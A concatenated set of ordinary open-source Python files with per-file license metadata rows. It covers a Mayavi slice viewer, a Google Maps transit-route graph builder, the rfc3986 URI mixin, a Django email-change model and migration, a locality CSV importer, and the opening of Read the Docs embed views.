"enabled", self.slice_plots, alias="y_slice_plane_visible")
self.z_slice_plane = self.make_z_slice_plane()
self.z_slice_plane.ipw.sync_trait(
"slice_position", self, alias="z")
self.z_slice_plane.ipw.sync_trait(
"enabled", self.slice_plots, alias="z_slice_plane_visible")
self.scene3d.disable_render = False
self.widgets_drawn = True
def _slice_plots_default(self):
return Slices()
def _sphere_viz_default(self):
# different between wx and qt
try:
color_tuple = self.sphere_color.toTuple()
except:
color_tuple = self.sphere_color
try:
pts = mlab.points3d(
self.sphere_coords[:,0],
self.sphere_coords[:,1],
self.sphere_coords[:,2],
mode='cube',
scale_factor=1,
figure = self.scene3d.mayavi_scene,
color = (color_tuple[0]/255.,
color_tuple[1]/255.,
color_tuple[2]/255.)
)
except:
pts = mlab.points3d(
self.sphere_coords[:,0],
self.sphere_coords[:,1],
self.sphere_coords[:,2],
mode='cube',
scale_factor=1,
figure = self.scene3d.mayavi_scene,
color = (1.,0.,0.)
)
return pts
def _sphere_coords_default(self):
return np.array(sphere_around_ijk(
self.radius, np.array([self.x, self.y, self.z])))
def _sphere_visible_changed(self):
self.sphere_viz.visible = self.sphere_visible
def _sphere_color_changed(self):
print "changing sphere color to", self.sphere_color
# different between wx and qt
try:
color_tuple = self.sphere_color.toTuple()
except:
color_tuple = self.sphere_color
self.sphere_viz.actor.property.color = (
color_tuple[0]/255.,
color_tuple[1]/255.,
color_tuple[2]/255.)
def make_x_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src,
figure=self.scene3d.mayavi_scene,
plane_orientation='x_axes',
name='Cut x',colormap="gray"
)
ipw.ipw.slice_position=self.x
ipw.ipw.interaction = 0
return ipw
def make_y_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src, colormap='gray',
figure=self.scene3d.mayavi_scene,
plane_orientation='y_axes',
name='Cut y')
ipw.ipw.slice_position=self.y
ipw.ipw.interaction = 0
return ipw
def make_z_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src,colormap='gray',
figure=self.scene3d.mayavi_scene,
plane_orientation='z_axes',
name='Cut z')
ipw.ipw.slice_position=self.z
ipw.ipw.interaction = 0
return ipw
@on_trait_change('sphere_x,sphere_y,sphere_z,radius')
def _update_sphere(self):
self.disable_render = True
self.sphere_coords = np.array(sphere_around_ijk(
self.radius, np.array([self.sphere_x,
self.sphere_y,
self.sphere_z])))
self.sphere_viz.mlab_source.reset(
x=self.sphere_coords[:,0],
y=self.sphere_coords[:,1],
z=self.sphere_coords[:,2],
)
self.disable_render = False
self.coordsupdated += 1
def arbitrary_voxel_query(self,new_indices):
self.disable_render = True
self.sphere_coords = np.array(new_indices)
self.sphere_viz.mlab_source.reset(
x=self.sphere_coords[:,0],
y=self.sphere_coords[:,1],
z=self.sphere_coords[:,2],
)
self.disable_render = False
self.coordsupdated += 1
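    # Illustrative usage (not part of the original class): an external caller
    # holding a SlicerPanel instance, here called ``panel``, can highlight an
    # explicit set of ijk voxel indices instead of the sphere selection, e.g.
    #   panel.arbitrary_voxel_query([(10, 10, 10), (10, 11, 10), (11, 10, 10)])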
@on_trait_change('scene3d.activated')
def display_scene3d(self):
if self.scene3d_inited: return
self.scene3d.mlab.view(40, 50)
self.scene3d.scene.background = (0, 0, 0)
# Keep the view always pointing up
self.scene3d.scene.interactor.interactor_style = \
tvtk.InteractorStyleTerrain()
#self.scene3d.mayavi_scene.scene.light_manager.light_mode = "vtk"
self.scene3d_inited = True
@on_trait_change('x_slice_plane_visible,y_slice_plane_visible,z_slice_plane_visible')
def update_slice_opacity(self,obj,name,old,new):
if name=='x_slice_plane_visible':
self.x_slice_plane.ipw.texture_visibility = new
if name=="y_slice_plane_visible":
self.y_slice_plane.ipw.texture_visibility = new
if name=="z_slice_plane_visible":
self.z_slice_plane.ipw.texture_visibility = new
sphere_widgets = VGroup(
Item(name="sphere_x",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name="extent_x",
format = "%i")),
Item(name="sphere_y",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name='extent_y',
format = "%i")),
Item(name="sphere_z",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name='extent_z',
format = "%i")),
Item(name="radius"),
Item(name="sphere_color"),
Item(name="sphere_visible"),
label="Search Sphere",
show_border=True
)
plot3d_group = Group(
Item('scene3d',
editor=SceneEditor(scene_class=Scene),
height=500, width=500),
show_labels=False)
slice_panel_group = HGroup(sphere_widgets,
Item('slice_plots',style="custom"),
show_labels=False)
# ----- Views -----
browser_view = View(
VSplit(
plot3d_group,
slice_panel_group
)
)
traits_view = View(
slice_panel_group
) | gpl-3.0 | -7,945,498,863,849,230,000 | 33.699681 | 89 | 0.550829 | false |
achak1987/greenroute | src/google.py | 1 | 8516 | '''
@author: Antorweep Chakravorty
'''
import googlemaps
import rapidjson as json
import pickle
import pprint
from datetime import datetime
from vertex import vertex
from edge import edge
class GoogleMapsAPI(object):
def __init__(self, username, password, app_id, app_token):
self.username = username
self.password = password
self.app_id = app_id
self.api_token = app_token
self.gmaps = googlemaps.Client(key=self.api_token)
@classmethod
def from_credentials_file(self, file_name):
f = open(file_name)
credentials = json.loads(f.read())["google"]
        args = tuple(credentials[key] for key in ('username', 'password', 'app_id', 'api_token'))
return GoogleMapsAPI(*args)
def decode_line(self, encoded):
"""Decodes a polyline that was encoded using the Google Maps method.
See http://code.google.com/apis/maps/documentation/polylinealgorithm.html
This is a straightforward Python port of Mark McClure's JavaScript polyline decoder
(http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)
and Peter Chng's PHP polyline decode
(http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)
"""
encoded_len = len(encoded)
index = 0
array = []
lat = 0
lng = 0
while index < encoded_len:
b = 0
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlat = ~(result >> 1) if result & 1 else result >> 1
lat += dlat
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlng = ~(result >> 1) if result & 1 else result >> 1
lng += dlng
array.append((lat * 1e-5, lng * 1e-5))
return array
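    # Illustrative usage (not part of the original class), using the sample
    # polyline from Google's polyline-algorithm documentation; decoded values
    # are approximate:
    #   api.decode_line("_p~iF~ps|U_ulLnnqC_mqNvxq`@")
    #   # -> [(38.5, -120.2), (40.7, -120.95), (43.252, -126.453)]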
def getGeoCode(self, address):
coordinates = self.gmaps.geocode(address)[0]['geometry']['location']
return str(coordinates["lat"]) + "," + str(coordinates["lng"])
def getAddress(self, longitude, latitude):
return self.gmaps.reverse_geocode((latitude, longitude))
def getRoutes(self, origin, destination, departBy, alternatives):
#Store all routes returned by GoogleMap API
graphs = []
directions_result = self.gmaps.directions(origin,
destination,
mode="transit",
departure_time=departBy,
alternatives=alternatives)
#print(json.dumps(directions_result, indent=2))
#itterate through each route
for d in directions_result:
#describes the legs of the journey.
#For routes that contain no waypoints, the route will consist of a single "leg,"
#but for routes that define one or more waypoints,
#the route will consist of one or more legs
legs = d["legs"]
#Store the vertexes
vertices = []
#Store the edges
edges = []
for l in legs:
                #Contains an array of steps denoting information about each separate step of the leg
steps = l["steps"]
for s in steps:
travel_mode = s["travel_mode"]
html_instructions = s["html_instructions"]
if travel_mode == "WALKING":
walking_steps = s["steps"]
for ws in walking_steps:
start_location = ws["start_location"]
end_location = ws["end_location"]
html_instructions = (ws["html_instructions"] if "html_instructions" in ws else "")
distance = ws["distance"]["value"]
duration = ws["duration"]["value"]
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "false")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "false")
connection = edge(start_vertex_id, end_vertex_id, travel_mode,
distance, duration)
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
edges.append(connection.getEdge())
elif travel_mode == "TRANSIT":
transit_details = s["transit_details"]
headsign = transit_details["headsign"]
departure_stop = transit_details["departure_stop"]
arrival_stop = transit_details["arrival_stop"]
departure_time = transit_details["departure_time"]
arrival_time = transit_details["arrival_time"]
num_stops = transit_details["num_stops"]
short_name = transit_details["line"]
start_location = s["start_location"]
end_location = s["end_location"]
stops_coordinates = self.decode_line(s["polyline"]["points"])
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "true")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "true")
distance = s["distance"]["value"]/num_stops
duration = s["duration"]["value"]/num_stops
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
prev_vertex_id = start_vertex_id
for stop in stops_coordinates:
lat = stop[0]
lng = stop[1]
vertex_id = hash(str(lat)+str(lng))
stop_vertex = vertex(vertex_id, lat, lng, "true")
connection = edge(prev_vertex_id, vertex_id, travel_mode,
distance, duration)
prev_vertex_id = vertex_id
vertices.append(stop_vertex.getVertex())
edges.append(connection.getEdge())
                        connection = edge(prev_vertex_id, end_vertex_id, travel_mode,
distance, duration)
edges.append(connection.getEdge())
#TODO: DRIVING
graphs.append((vertices, edges))
return graphs
#if __name__ == "__main__":
#main()
api = GoogleMapsAPI.from_credentials_file('credentials.json')
# Geocoding an address
origin = api.getGeoCode('Randaberg')
destination = api.getGeoCode('Kjell Arholmsgate 41, 4036 Stavanger, NO')
now = datetime.now()
#depart = datetime(2016, 11, 22, 12, 0, 0)
routes = api.getRoutes(origin, destination, now, "false")
with open("graphs.out", 'wb') as f:
pickle.dump(routes, f)
| mit | -5,904,404,823,734,875,000 | 39.746411 | 136 | 0.486731 | false |
liszd/whyliam.workflows.youdao | urllib3/packages/rfc3986/_mixin.py | 1 | 13255 | """Module containing the implementation of the URIMixin class."""
import warnings
from . import exceptions as exc
from . import misc
from . import normalizers
from . import validators
class URIMixin(object):
"""Mixin with all shared methods for URIs and IRIs."""
__hash__ = tuple.__hash__
def authority_info(self):
"""Return a dictionary with the ``userinfo``, ``host``, and ``port``.
If the authority is not valid, it will raise a
:class:`~rfc3986.exceptions.InvalidAuthority` Exception.
:returns:
``{'userinfo': 'username:password', 'host': 'www.example.com',
'port': '80'}``
:rtype: dict
:raises rfc3986.exceptions.InvalidAuthority:
If the authority is not ``None`` and can not be parsed.
"""
if not self.authority:
return {"userinfo": None, "host": None, "port": None}
match = self._match_subauthority()
if match is None:
# In this case, we have an authority that was parsed from the URI
# Reference, but it cannot be further parsed by our
# misc.SUBAUTHORITY_MATCHER. In this case it must not be a valid
# authority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
# We had a match, now let's ensure that it is actually a valid host
# address if it is IPv4
matches = match.groupdict()
host = matches.get("host")
if (
host
and misc.IPv4_MATCHER.match(host)
and not validators.valid_ipv4_host_address(host)
):
# If we have a host, it appears to be IPv4 and it does not have
# valid bytes, it is an InvalidAuthority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
return matches
def _match_subauthority(self):
return misc.SUBAUTHORITY_MATCHER.match(self.authority)
@property
def host(self):
"""If present, a string representing the host."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["host"]
@property
def port(self):
"""If present, the port extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["port"]
@property
def userinfo(self):
"""If present, the userinfo extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["userinfo"]
def is_absolute(self):
"""Determine if this URI Reference is an absolute URI.
See http://tools.ietf.org/html/rfc3986#section-4.3 for explanation.
:returns: ``True`` if it is an absolute URI, ``False`` otherwise.
:rtype: bool
"""
return bool(misc.ABSOLUTE_URI_MATCHER.match(self.unsplit()))
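    # Illustrative examples (not part of the original mixin): RFC 3986
    # section 4.3 requires a scheme and forbids a fragment, so with the
    # package-level ``uri_reference`` helper:
    #   uri_reference("http://example.com/path").is_absolute()       -> True
    #   uri_reference("//example.com/path").is_absolute()            -> False
    #   uri_reference("http://example.com/path#frag").is_absolute()  -> False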
def is_valid(self, **kwargs):
"""Determine if the URI is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require_scheme: Set to ``True`` if you wish to require the
presence of the scheme component.
:param bool require_authority: Set to ``True`` if you wish to require
the presence of the authority component.
:param bool require_path: Set to ``True`` if you wish to require the
presence of the path component.
:param bool require_query: Set to ``True`` if you wish to require the
presence of the query component.
:param bool require_fragment: Set to ``True`` if you wish to require
the presence of the fragment component.
:returns: ``True`` if the URI is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
validators = [
(self.scheme_is_valid, kwargs.get("require_scheme", False)),
(self.authority_is_valid, kwargs.get("require_authority", False)),
(self.path_is_valid, kwargs.get("require_path", False)),
(self.query_is_valid, kwargs.get("require_query", False)),
(self.fragment_is_valid, kwargs.get("require_fragment", False)),
]
return all(v(r) for v, r in validators)
def authority_is_valid(self, require=False):
"""Determine if the authority component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require:
Set to ``True`` to require the presence of this component.
:returns:
``True`` if the authority is valid. ``False`` otherwise.
:rtype:
bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
try:
self.authority_info()
except exc.InvalidAuthority:
return False
return validators.authority_is_valid(
self.authority, host=self.host, require=require
)
def scheme_is_valid(self, require=False):
"""Determine if the scheme component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the scheme is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.scheme_is_valid(self.scheme, require)
def path_is_valid(self, require=False):
"""Determine if the path component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the path is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.path_is_valid(self.path, require)
def query_is_valid(self, require=False):
"""Determine if the query component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the query is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.query_is_valid(self.query, require)
def fragment_is_valid(self, require=False):
"""Determine if the fragment component is valid.
.. deprecated:: 1.1.0
        Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the fragment is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.fragment_is_valid(self.fragment, require)
def normalized_equality(self, other_ref):
"""Compare this URIReference to another URIReference.
:param URIReference other_ref: (required), The reference with which
we're comparing.
:returns: ``True`` if the references are equal, ``False`` otherwise.
:rtype: bool
"""
return tuple(self.normalize()) == tuple(other_ref.normalize())
def resolve_with(self, base_uri, strict=False):
"""Use an absolute URI Reference to resolve this relative reference.
Assuming this is a relative reference that you would like to resolve,
use the provided base URI to resolve it.
See http://tools.ietf.org/html/rfc3986#section-5 for more information.
:param base_uri: Either a string or URIReference. It must be an
absolute URI or it will raise an exception.
:returns: A new URIReference which is the result of resolving this
reference using ``base_uri``.
:rtype: :class:`URIReference`
:raises rfc3986.exceptions.ResolutionError:
If the ``base_uri`` is not an absolute URI.
"""
if not isinstance(base_uri, URIMixin):
base_uri = type(self).from_string(base_uri)
if not base_uri.is_absolute():
raise exc.ResolutionError(base_uri)
# This is optional per
# http://tools.ietf.org/html/rfc3986#section-5.2.1
base_uri = base_uri.normalize()
# The reference we're resolving
resolving = self
if not strict and resolving.scheme == base_uri.scheme:
resolving = resolving.copy_with(scheme=None)
# http://tools.ietf.org/html/rfc3986#page-32
if resolving.scheme is not None:
target = resolving.copy_with(
path=normalizers.normalize_path(resolving.path)
)
else:
if resolving.authority is not None:
target = resolving.copy_with(
scheme=base_uri.scheme,
path=normalizers.normalize_path(resolving.path),
)
else:
if resolving.path is None:
if resolving.query is not None:
query = resolving.query
else:
query = base_uri.query
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=base_uri.path,
query=query,
)
else:
if resolving.path.startswith("/"):
path = normalizers.normalize_path(resolving.path)
else:
path = normalizers.normalize_path(
misc.merge_paths(base_uri, resolving.path)
)
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=path,
query=resolving.query,
)
return target
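    # Illustrative usage (not part of the original mixin), following the
    # reference-resolution examples of RFC 3986 section 5.4 and using the
    # package-level ``uri_reference`` helper:
    #   base = uri_reference("http://a/b/c/d;p?q")
    #   uri_reference("g?y").resolve_with(base).unsplit()   # -> "http://a/b/c/g?y"
    #   uri_reference("../g").resolve_with(base).unsplit()  # -> "http://a/b/g"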
def unsplit(self):
"""Create a URI string from the components.
:returns: The URI Reference reconstituted as a string.
:rtype: str
"""
# See http://tools.ietf.org/html/rfc3986#section-5.3
result_list = []
if self.scheme:
result_list.extend([self.scheme, ":"])
if self.authority:
result_list.extend(["//", self.authority])
if self.path:
result_list.append(self.path)
if self.query is not None:
result_list.extend(["?", self.query])
if self.fragment is not None:
result_list.extend(["#", self.fragment])
return "".join(result_list)
def copy_with(
self,
scheme=misc.UseExisting,
authority=misc.UseExisting,
path=misc.UseExisting,
query=misc.UseExisting,
fragment=misc.UseExisting,
):
"""Create a copy of this reference with the new components.
:param str scheme:
(optional) The scheme to use for the new reference.
:param str authority:
(optional) The authority to use for the new reference.
:param str path:
(optional) The path to use for the new reference.
:param str query:
(optional) The query to use for the new reference.
:param str fragment:
(optional) The fragment to use for the new reference.
:returns:
New URIReference with provided components.
:rtype:
URIReference
"""
attributes = {
"scheme": scheme,
"authority": authority,
"path": path,
"query": query,
"fragment": fragment,
}
for key, value in list(attributes.items()):
if value is misc.UseExisting:
del attributes[key]
uri = self._replace(**attributes)
uri.encoding = self.encoding
return uri
| mit | 3,825,426,568,369,881,600 | 34.727763 | 78 | 0.572312 | false |
tarak/django-change-email | change_email/models.py | 1 | 7639 | from datetime import timedelta
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import models
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.core.signing import Signer
from django.core.signing import BadSignature
from change_email.conf import settings
from change_email.managers import ExpiredEmailChangeManager
from change_email.managers import PendingEmailChangeManager
class EmailChange(models.Model):
"""
A model to temporarily store an email adress change request.
"""
new_email = models.EmailField(help_text=_('The new email address that'
' still needs to be confirmed.'),
verbose_name=_('new email address'),)
date = models.DateTimeField(auto_now_add=True,
help_text=_('The date and time the email '
'address change was requested.'),
verbose_name=_('date'),)
user = models.OneToOneField(settings.AUTH_USER_MODEL,
help_text=_('The user that has requested the'
' email address change.'),
verbose_name=_('user'),)
site = models.ForeignKey(Site, blank=True, null=True)
objects = models.Manager()
expired_objects = ExpiredEmailChangeManager()
pending_objects = PendingEmailChangeManager()
class Meta:
verbose_name = _('email address change request')
verbose_name_plural = _('email address change requests')
get_latest_by = "date"
def __unicode__(self):
return "%s" % self.user
def get_absolute_url(self):
return reverse('change_email_detail', kwargs={'pk': self.pk})
def has_expired(self, seconds=None):
"""
Checks whether this request has already expired.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: ``True`` if the request has already expired,
``False`` otherwise.
:rtype: bool
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
expiration_date = timezone.now() - delta
return expiration_date >= self.date
def check_signature(self, signature):
"""
Checks if
- the signature has not expired by calling :func:`has_expired`.
- the signature has not been tampered with by
calling :func:`verify_signature`.
:arg str signature: The signature to check, as generated
by :func:`make_signature`.
:returns: ``True`` if the check was successfully completed,
``False`` otherwise.
:rtype: bool
"""
if not self.has_expired():
return self.verify_signature(signature)
return False
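    # Illustrative flow (not part of the original model): a confirmation view
    # would typically fetch the pending request of the signed-in user and check
    # the signature taken from the one-time URL, e.g.
    #   change = EmailChange.objects.get(user=request.user)
    #   if change.check_signature(signature):
    #       ...  # apply change.new_email to the user, then delete ``change``
    # where ``signature`` is the value produced earlier by make_signature().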
def get_expiration_date(self, seconds=None):
"""
Returns the expiration date of an :model:`EmailChange` object by adding
a given amount of seconds to it.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: A :py:class:`datetime` object representing the expiration
date.
:rtype: :py:obj:`.datetime`
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
return self.date + delta
def make_signature(self):
"""
Generates a signature to use in one-time secret URL's
to confirm the email address change request.
:returns: A signature.
:rtype: str
"""
signer = Signer()
value = signer.sign(self.new_email)
email, signature = value.split(':', 1)
return signature
def send_confirmation_mail(self, request):
"""
An instance method to send a confirmation mail to the new
email address.
The generation of a confirmation email will use three templates that
can be set in each project's settings:
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE`.
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE`
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE`
These templates will receive the following context variables:
``date``
The date when the email address change was requested.
``timeout_date``
The date whe the request will expire.
``current_site``
An object representing the current site on which the user
is logged in. Depending on whether ``django.contrib.sites``
is installed, this may be an instance of either
``django.contrib.sites.models.Site`` (if the sites
application is installed) or
``django.contrib.sites.models.RequestSite`` (if
not). Consult the documentation for the Django sites
framework for details regarding these objects' interfaces.
``new_email``
The new email address.
``protocol``
The protocol used to generate the confirmation URL, either HTTP or HTTPS.
To use HTTPS set :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_USE_HTTPS`
to True.
``signature``
The confirmation signature for the new email address.
``user``
The user that has requested the email address change.
:arg obj request: The request object.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
subject = settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE
body_htm = settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE
body_txt = settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE
context = {'current_site': current_site,
'date': self.date,
'timeout_date': self.get_expiration_date(),
'new_email': self.new_email,
'protocol': settings.EMAIL_CHANGE_USE_HTTPS and 'https' or 'http',
'signature': self.make_signature(),
'user': self.user}
subject = render_to_string(subject, context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
text_message = render_to_string(body_txt, context)
if settings.EMAIL_CHANGE_HTML_EMAIL:
html_message = render_to_string(body_htm, context)
msg = EmailMultiAlternatives(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
msg.attach_alternative(html_message, "text/html")
msg.send()
else:
send_mail(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
def verify_signature(self, signature):
"""
Checks if the signature has been tampered with.
:arg str signature: The signature to check, as generated by
:func:`make_signature`.
:returns: ``True`` if the signature has not been tampered with,
``False`` otherwise.
:rtype: bool
"""
signer = Signer()
value = "%s:%s" % (self.new_email, signature)
try:
signer.unsign(value)
except BadSignature:
return False
return True
| bsd-3-clause | 3,157,295,114,515,443,000 | 35.37619 | 87 | 0.645765 | false |
qgis/QGIS-Django | qgis-app/styles/migrations/0008_auto_20201215_2124.py | 1 | 2000 | # Generated by Django 2.2.13 on 2020-12-15 21:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('styles', '0007_auto_20201109_0112'),
]
operations = [
migrations.AlterField(
model_name='style',
name='approved',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you wish to approve this resource.', verbose_name='Approved'),
),
migrations.AlterField(
model_name='style',
name='creator',
field=models.ForeignKey(help_text='The user who uploaded this resource.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Created by'),
),
migrations.AlterField(
model_name='style',
name='download_count',
field=models.IntegerField(default=0, editable=False, help_text='The number of times this resource has been downloaded. This is updated automatically.', verbose_name='Downloads'),
),
migrations.AlterField(
model_name='style',
name='require_action',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you require creator to update the resource.', verbose_name='Requires Action'),
),
migrations.AlterField(
model_name='stylereview',
name='review_date',
field=models.DateTimeField(auto_now_add=True, help_text='The review date. Automatically added on review resource.', verbose_name='Reviewed on'),
),
migrations.AlterField(
model_name='stylereview',
name='reviewer',
field=models.ForeignKey(help_text='The user who reviewed this GeoPackage.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Reviewed by'),
),
]
| gpl-2.0 | -8,970,080,980,762,410,000 | 43.444444 | 190 | 0.6405 | false |
alexhayes/django-geopostcodes | django_geopostcodes/helpers.py | 1 | 1155 | # -*- coding: utf-8 -*-
"""
django_geopostcodes.helpers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helper functions for django-geopostcodes.
"""
from __future__ import absolute_import, print_function, unicode_literals
import csv
from django.contrib.gis.geos import Point
from django.db.transaction import atomic
from .models import Locality
def import_localities(path, delimiter=';'):
"""
Import localities from a CSV file.
:param path: Path to the CSV file containing the localities.
"""
creates = []
updates = []
with open(path, mode="r") as infile:
reader = csv.DictReader(infile, delimiter=str(delimiter))
with atomic():
for row in reader:
row['point'] = Point(float(row['longitude']),
float(row['latitude']))
locality, created = Locality.objects.update_or_create(
id=row['id'],
defaults=row
)
if created:
creates.append(locality)
else:
updates.append(locality)
return creates, updates
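# Illustrative usage (not part of the original helper); the file name below is
# hypothetical and the CSV is assumed to use the Locality model's field names,
# including ``id``, ``longitude`` and ``latitude``:
#   created, updated = import_localities('GeoPC_NZ.csv', delimiter=';')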
| mit | 4,832,721,024,787,421,000 | 25.25 | 72 | 0.547186 | false |
rtfd/readthedocs.org | readthedocs/embed/views.py | 1 | 13361 | """Views for the embed app."""
import functools
import json
import logging
import re
from urllib.parse import urlparse
from django.shortcuts import get_object_or_404
from django.template.defaultfilters import slugify
from django.utils.functional import cached_property
from docutils.nodes import make_id
from pyquery import PyQuery as PQ # noqa
from rest_framework import status
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from readthedocs.api.v2.mixins import CachedResponseMixin
from readthedocs.api.v2.permissions import IsAuthorizedToViewVersion
from readthedocs.builds.constants import EXTERNAL
from readthedocs.core.resolver import resolve
from readthedocs.core.unresolver import unresolve
from readthedocs.core.utils.extend import SettingsOverrideObject
from readthedocs.embed.utils import recurse_while_none
from readthedocs.projects.models import Project
from readthedocs.storage import build_media_storage
log = logging.getLogger(__name__)
def escape_selector(selector):
"""Escape special characters from the section id."""
regex = re.compile(r'(!|"|#|\$|%|\'|\(|\)|\*|\+|\,|\.|\/|\:|\;|\?|@)')
ret = re.sub(regex, r'\\\1', selector)
return ret
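# Illustrative example (not part of the original module): characters that are
# significant in CSS selectors get backslash-escaped, e.g.
#   escape_selector("module.submodule")  # -> 'module\\.submodule'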
def clean_links(obj, url):
"""
Rewrite (internal) links to make them absolute.
1. external links are not changed
2. prepend URL to links that are just fragments (e.g. #section)
3. prepend URL (without filename) to internal relative links
"""
if url is None:
return obj
for link in obj.find('a'):
base_url = urlparse(url)
# We need to make all internal links, to be absolute
href = link.attrib['href']
parsed_href = urlparse(href)
if parsed_href.scheme or parsed_href.path.startswith('/'):
# don't change external links
continue
if not parsed_href.path and parsed_href.fragment:
# href="#section-link"
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
continue
if not base_url.path.endswith('/'):
# internal relative link
# href="../../another.html" and ``base_url`` is not HTMLDir
# (e.g. /en/latest/deep/internal/section/page.html)
# we want to remove the trailing filename (page.html) and use the rest as base URL
# The resulting absolute link should be
# https://slug.readthedocs.io/en/latest/deep/internal/section/../../another.html
# remove the filename (page.html) from the original document URL (base_url) and,
path, _ = base_url.path.rsplit('/', 1)
# append the value of href (../../another.html) to the base URL.
base_url = base_url._replace(path=path + '/')
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
return obj
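# Illustrative example (not part of the original module); the URL below is
# hypothetical. A fragment-only link is rewritten against the page URL:
#   pq = PQ('<div><a href="#install">Install</a></div>')
#   clean_links(pq, 'https://docs.example.com/en/latest/intro.html')
#   # the anchor's href becomes
#   # 'https://docs.example.com/en/latest/intro.html#install'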
class EmbedAPIBase(CachedResponseMixin, APIView):
